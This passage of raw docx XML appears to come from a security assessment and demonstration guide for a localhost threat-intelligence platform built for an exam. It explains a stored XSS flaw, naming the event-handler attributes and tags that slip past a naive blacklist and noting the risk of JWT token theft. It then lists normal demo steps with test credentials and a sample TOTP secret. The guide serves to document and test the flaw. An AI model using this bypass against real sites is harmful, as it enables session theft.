        <w:t xml:space="preserve"> Why Blacklist is Bypassed: In src/controllers/reportController.js (lines 35–40), sanitization uses naive substring replacement: '.replace(/&lt;script.../gi, '').replace(/javascript:/gi, 'blocked:').replace(/onerror=/gi, 'blocked:').replace(/onload=/gi, 'blocked:)'. It completely fails to filter HTML5 attributes like 'onmouseover=', 'ontoggle=', 'onfocus=', or tags like '&lt;details&gt;' and '&lt;iframe&gt;'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security Impact: Stored Cross-Site Scripting (XSS). When viewed by an analyst or administrator on the frontend, the script executes within the privileged session origin, allowing theft of JWT tokens, exfiltration of confidential threat feeds, and arbitrary triage tampering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE ID: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CWE Classification: CWE-79 (Improper Neutralization of Input During Web Page Generation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE Category: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> STRIDE Threat Model: T07 (Tampering / Elevation of Privilege).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 7 ID: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Phase 7 Vulnerability Mapping: V04 (Stored Cross-Site Scripting).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence Capture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> When to Take Screenshots: (1) Capture the submission form showing the payload entered and green success alert. (2) Capture DevTools Console showing the raw stored payload containing 'onmouseover' returned by the API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>SECTION 3 — NORMAL APPLICATION DEMONSTRATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>This section provides exact, repeatable instructions for demonstrating all 12 core platform capabilities in their verified normal operational state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.1 Application Startup &amp; Health Probe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / Command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>COMMAND: npm start | URL: http://localhost:3000/api/health</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Account Persona: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Anonymous / Unauthenticated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Execution Steps: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1. In Terminal 1, execute 'npm start'.</w:t>
        <w:br/>
        <w:t>2. In Terminal 2, execute: curl http://localhost:3000/api/health</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Result: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HTTP 200 OK returning JSON with status: 'UP', service: 'cyber-threat-intelligence-platform', and version: '1.0.0'. No stack traces or environment secrets exposed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot to Capture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Terminal 2 output displaying clean JSON health response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exam Phase Mapping: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Phase 5 (System Architecture &amp; Security Zones)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.2 Secure Login &amp; Bcrypt Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / Command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>URL: http://localhost:3000 (Screen 1: Authentication &amp; MFA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Account Persona: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>contributor_alex (Master Password: Password123!)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Execution Steps: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1. Navigate to Screen 1.</w:t>
        <w:br/>
        <w:t>2. In Step 1, enter username 'contributor_alex' and password 'Password123!'.</w:t>
        <w:br/>
        <w:t>3. Click 'Verify Credentials → Request TOTP Challenge'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Result: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HTTP 200 OK. Form advances to Step 2 of 2. Temporary 5-minute MFA token issued. Constant-time Bcrypt comparison verified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot to Capture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Screen 1 card advancing to Step 2 with green banner: 'Credentials verified! Enter 6-digit TOTP code'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exam Phase Mapping: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Phase 2 (REQ-F-01) &amp; Phase 7 (STRIDE T01 Countermeasure)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.3 RFC 6238 TOTP Multi-Factor Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / Command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>URL: http://localhost:3000 (Screen 1: Step 2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Account Persona: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>contributor_alex (TOTP Secret: JBSWY3DPEHPK3PXQ)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Execution Steps: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1. In Step 2, enter code '123456' (or the auto-calculated RFC 6238 code).</w:t>
        <w:br/>
        <w:t>2. Click 'Complete Authentication'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Result: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HTTP 200 OK. Header displays: '[CONTRIB] Alex Rivera • Org: Cyber Defense Corp'. Cryptographically signed 1-hour JWT token appears in token status pane.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot to Capture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Top header showing authenticated user chip and decoded JWT claims preview.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exam Phase Mapping: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Phase 2 (REQ-F-01) &amp; Phase 7 (STRIDE T01 Countermeasure)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.4 Role-Based Access Control (RBAC) Enforcement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / Command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>URL: http://localhost:3000/api/triage/pending</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Account Persona: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>consumer_siem (ROLE_CONSUMER) vs. analyst_riya (ROLE_ANALYST)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Execution Steps: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1. In Terminal 2, run RBAC test:</w:t>
        <w:br/>
        <w:t>node --test tests/unit/tlpPolicy.test.js</w:t>
        <w:br/>
        <w:t>2. Query triage queue using Consumer token: curl -i -H 'Authorization: Bearer &lt;CONSUMER_TOKEN&gt;' http://localhost:3000/api/triage/pending</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Result: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Consumer receives HTTP 403 Forbidden ('Access denied: Insufficient role privileges'). Analyst receives HTTP 200 OK with pending queue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot to Capture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Terminal displaying side-by-side HTTP 403 Forbidden vs. HTTP 200 OK.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exam Phase Mapping: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Phase 2 (REQ-F-06) &amp; Phase 7 (STRIDE T06 Countermeasure)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.5 Threat Indicator (IoC) Ingestion &amp; Deduplication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / Command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>URL: http://localhost:3000 (Screen 2: Tab 2) or POST /api/iocs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Account Persona: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>contributor_alex (ROLE_CONTRIBUTOR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Execution Steps: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1. Click '2. IoC &amp; Report Ingestion' tab.</w:t>
        <w:br/>
        <w:t>2. Select Type: 'IPV4', Value: '198.51.100.99', TLP: 'AMBER', Description: 'C2 beacon'.</w:t>
        <w:br/>
        <w:t>3. Click 'Validate, Defang &amp; Ingest IoC'.</w:t>
        <w:br/>
        <w:t>4. Click the submit button a second time with the exact same values.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Result: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>First submission: HTTP 201 Created with status 'PENDING'. Second submission: HTTP 200 OK with duplicate sighting alert ('isDuplicate: true').</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot to Capture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Screen 2 showing green 'IoC Ingested Successfully' alert followed by duplicate sighting notification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exam Phase Mapping: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Phase 2 (REQ-F-02) &amp; Phase 4 (DFD Process 1.0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.6 Real-Time Strategy Pattern Validation &amp; Defanging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / Command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>URL: http://localhost:3000 (Screen 2: Tab 2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
